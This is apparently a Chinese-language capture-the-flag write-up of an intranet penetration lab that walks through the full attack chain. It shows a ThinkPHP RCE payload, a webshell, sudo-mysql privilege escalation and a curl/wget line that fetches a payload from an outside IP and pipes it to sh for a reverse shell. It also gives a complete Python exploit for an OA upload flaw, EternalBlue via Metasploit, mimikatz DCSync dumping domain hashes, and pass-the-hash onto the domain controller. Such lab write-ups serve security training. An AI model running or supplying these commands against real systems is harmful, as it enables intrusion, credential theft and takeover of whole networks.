Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。
打开是一个ubuntu服务器的登陆界面,fscan扫描结果:
PS C:\Wolf\Tools\fscan> .\fscan.exe -h 39.98.120.227
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
39.98.120.227:22 open
39.98.120.227:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.98.120.227 code:200 len:5578 title:Bootstrap Material Admin
[+] PocScan http://39.98.120.227 poc-yaml-thinkphp5023-method-rce poc1
已完成 2/2
[*] 扫描结束,耗时: 29.9738805s有一个TP的5.0.23的RCE漏洞,直接上框架利用工具:
[+] 存在ThinkPHP 5.0.23 RCE
Payload: http://39.98.120.227//?s=captcha&test=-1 Post: _method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1
[+] http://39.98.120.227//shell.php Pass:shell哥斯拉连接,传的php马,加密器选PHP_EVAL_XOR_BASE64
查看权限:
/var/www/html/ > id
uid=33(www-data) gid=33(www-data) groups=33(www-data)普通用户,找提权
find / -user root -perm -4000 -print 2> result.txt2> result.txt是把标准错误输出重定向到 result.txt
/var/www/html/ > find / -user root -perm -4000 -print 2> result.txt
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/su
/usr/bin/chsh
/usr/bin/stapbpf
/usr/bin/staprun
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/mount
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device设置了SUID的文件会以属主也就是root权限运行,正好用来提权
或者用这个命令:
sudo -l列出当前用户可以通过 sudo 执行哪些命令
/var/www/html/ > sudo -l
Matching Defaults entries for www-data on ubuntu-web01:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu-web01:
(root) NOPASSWD: /usr/bin/mysql关键的是最底下的输出,可以看到NOPASSWD,就是说我们执行mysql命令的时候直接sudo进行,不需要密码
查看GTFOBins(正在本地搭建中),查看用mysql命令进行提权
/var/www/html/ > sudo mysql -e '\! id'
uid=0(root) gid=0(root) groups=0(root)可以看到现在已经提权成功,看了四五个好像都是这么提的权,最近看看有没有其他的方法,可能不会有
找一下flag
/var/www/html/ > sudo mysql -e '\! find / -name *flag*'
/var/www/html/ > sudo mysql -e '\! cat /root/flag/flag01.txt'得到flag01:
flag01: flag{60b53231-
这个时候可以执行反弹shell上线vshell,因为是ubuntu系统:
(curl -fsSL -m180 http://182.92.244.103:8084/slt||wget -T180 -q http://182.92.244.103:8084/slt)|sh一开始安全组忘记开放端口了一直连不上,后来连上了,差点急哭了
root@ubuntu-web01:/# id
uid=0(root) gid=0(root) groups=0(root)上来看一下IP,对于仅做题来说肯定是找到flag了就往深处继续找flag,而且找到第一个flag的时候提示了后续的flag在内网,对于真实环境而言,可以继续爬当前服务器有些什么有用的凭证,有哪些数据,不过现在仅仅做题,所以直接开始进内网
查看一下ip,上传fscan,也可以上传别的,只要能探测就行
root@ubuntu-web01:/# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.22.1.15 netmask 255.255.0.0 broadcast 172.22.255.255
inet6 fe80::216:3eff:fe09:947e prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:09:94:7e txqueuelen 1000 (Ethernet)
RX packets 541274 bytes 215199342 (215.1 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 419305 bytes 40971021 (40.9 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 1816 bytes 171905 (171.9 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1816 bytes 171905 (171.9 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0得到这个外网机器在内网的ip:172.22.1.15
上传fscan,要给权限
root@ubuntu-web01:/usr/bin# cd /tmp
root@ubuntu-web01:/tmp# ls
bash fscan
root@ubuntu-web01:/tmp# chmod +x fscan
root@ubuntu-web01:/tmp# ./fscan -h 172.22.1.15/16内网还有三台机器:
[*] NetInfo
[*]172.22.1.21
[->]XIAORANG-WIN7
[->]172.22.1.21
[*] NetInfo
[*]172.22.1.18
[->]XIAORANG-OA01
[->]172.22.1.18
[*] NetInfo
[*]172.22.1.2
[->]DC01
[->]172.22.1.2
[+] MS17-010 172.22.1.21 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] OsInfo 172.22.1.2 (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.1.2 [+] DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] NetBios 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600
[*] WebTitle http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统172.22.1.21这台有永恒之蓝可以打,
172.22.1.2是一台DC
172.22.1.18是一台信呼OA,可以查一下CVE
搭建隧道,vshell设置一下端口,服务器设置入规则,Proxifier设置代理服务器,设置规则即可
先看这个OA,知道版本了直接搜Nday
找不到多少能看的,csdn的总是要会员
脚本:
import requests
session = requests.session()
url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'
data1 = {
'rempass': '0',
'jmpass': 'false',
'device': '1625884034525',
'ltype': '0',
'adminuser': 'YWRtaW4=::',
'adminpass': 'YWRtaW4xMjM=',
'yanzm': ''
}
r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('shell.php', 'r+')})
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('whoami');")
print(r.text)当前目录创一个1.php放一句话木马
执行后shell目录会给出来,直接哥斯拉连接
C:/phpStudy/PHPTutorial/WWW/upload/2026-04/ > whoami
nt authority\systemwindows命令和linux不一样,打开的是cmd
flag一般在admin目录下,我也不知道为啥这么设计
C:\Users\Administrator\flag > type flag02.txt
___ ___ ___ ________ ________ ________ ________ ________ ________
|\ \ / /|\ \|\ __ \|\ __ \|\ __ \|\ __ \|\ ___ \|\ ____\
\ \ \/ / | \ \ \ \|\ \ \ \|\ \ \ \|\ \ \ \|\ \ \ \\ \ \ \ \___|
\ \ / / \ \ \ \ __ \ \ \\\ \ \ _ _\ \ __ \ \ \\ \ \ \ \ ___
/ \/ \ \ \ \ \ \ \ \ \\\ \ \ \\ \\ \ \ \ \ \ \\ \ \ \ \|\ \
/ /\ \ \ \__\ \__\ \__\ \_______\ \__\\ _\\ \__\ \__\ \__\\ \__\ \_______\
/__/ /\ __\ \|__|\|__|\|__|\|_______|\|__|\|__|\|__|\|__|\|__| \|__|\|_______|
|__|/ \|__|
flag02: 2ce3-4813-87d4-
Awesome! ! ! You found the second flag, now you can attack the domain controller.
这里其实可以继续做,添加新的管理员然后RDP得到可视化界面
# 添加用户
net user vch qwer1234! /add
# 添加用户到管理员组
net localgroup administrators vch /add
# 查看本地管理员组
net localgroup administrators
# 找域管理员
net group "domain admins" /domain提示打DC,这里利用永恒之蓝拿到shell,
msf > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp_uuid
payload => windows/x64/meterpreter/bind_tcp_uuid
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 172.22.1.21
RHOSTS => 172.22.1.21
msf exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] 172.22.1.21:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.22.1.21:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] 172.22.1.21:445 - Scanned 1 of 1 hosts (100% complete)
[+] 172.22.1.21:445 - The target is vulnerable.
[*] 172.22.1.21:445 - Connecting to target for exploitation.
[+] 172.22.1.21:445 - Connection established for exploitation.
[+] 172.22.1.21:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.22.1.21:445 - CORE raw buffer dump (53 bytes)
[*] 172.22.1.21:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 172.22.1.21:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris
[*] 172.22.1.21:445 - 0x00000020 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 e 7601 Service P
[*] 172.22.1.21:445 - 0x00000030 61 63 6b 20 31 ack 1
[+] 172.22.1.21:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.22.1.21:445 - Trying exploit with 12 Groom Allocations.
[*] 172.22.1.21:445 - Sending all but last fragment of exploit packet
[*] 172.22.1.21:445 - Starting non-paged pool grooming
[+] 172.22.1.21:445 - Sending SMBv2 buffers
[+] 172.22.1.21:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.22.1.21:445 - Sending final SMBv2 buffers.
[*] 172.22.1.21:445 - Sending last fragment of exploit packet!
[*] 172.22.1.21:445 - Receiving response from exploit packet
[+] 172.22.1.21:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.22.1.21:445 - Sending egg to corrupted connection.
[*] 172.22.1.21:445 - Triggering free of corrupted buffer.
[*] Started bind TCP handler against 172.22.1.21:4444
[*] Sending stage (244806 bytes) to 172.22.1.21
[*] Meterpreter session 1 opened (127.0.0.1:7646 -> 172.22.1.21:4444) at 2026-04-22 19:19:37 +0800
[+] 172.22.1.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.22.1.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.22.1.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >这里已经可以执行shell命令
然后拿kiwi拿hash
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502 krbtgt fb812eea13a18b7fcdb8e6d67ddc205b 514
1106 Marcus e07510a4284b3c97c8e7dee970918c5c 512
1107 Charles f6a9881cd5ae709abb4ac9ab87f24617 512
1000 DC01$ c7bc127e8dc6d7520f6e5d26c19387ba 532480
500 Administrator 10cf89a850fb1cdbe6bb432b859164c8 512
1104 XIAORANG-OA01$ eeb40575dc8ff47b57189c37e53f8eb0 4096
1108 XIAORANG-WIN7$ 11b6f19640d90addd1f593bd01e22379 4096
mimikatz(powershell) # exit
Bye!这里用impacket,pwn爷给的,直接用
PS C:\Users\21899> impacket-wmiexec.exe -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang.lab/Administrator@172.22.1.2
-codec gb2312
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>dir
驱动器 C 中的卷没有标签。
卷的序列号是 4659-5697
C:\ 的目录
2022/05/12 17:17 <DIR> PerfLogs
2022/06/05 19:46 <DIR> Program Files
2022/05/18 10:00 <DIR> Program Files (x86)
2026/04/22 19:48 <DIR> Windows
0 个文件 0 字节
C:\>还是相同的目录
C:\Users\Administrator\flag>type flag03.txt
___ ___
\\ / / / / // | | // ) ) // ) ) // | | /| / / // ) )
\ / / / //__| | // / / //___/ / //__| | //| / / //
/ / / / / ___ | // / / / ___ ( / ___ | // | / / // ____
/ /\\ / / // | | // / / // | | // | | // | / / // / /
/ / \\ __/ /___ // | | ((___/ / // | | // | | // |/ / ((____/ /
flag03: e8f88d0d43d6}
Unbelievable! ! You found the last flag, which means you have full control over the entire domain network.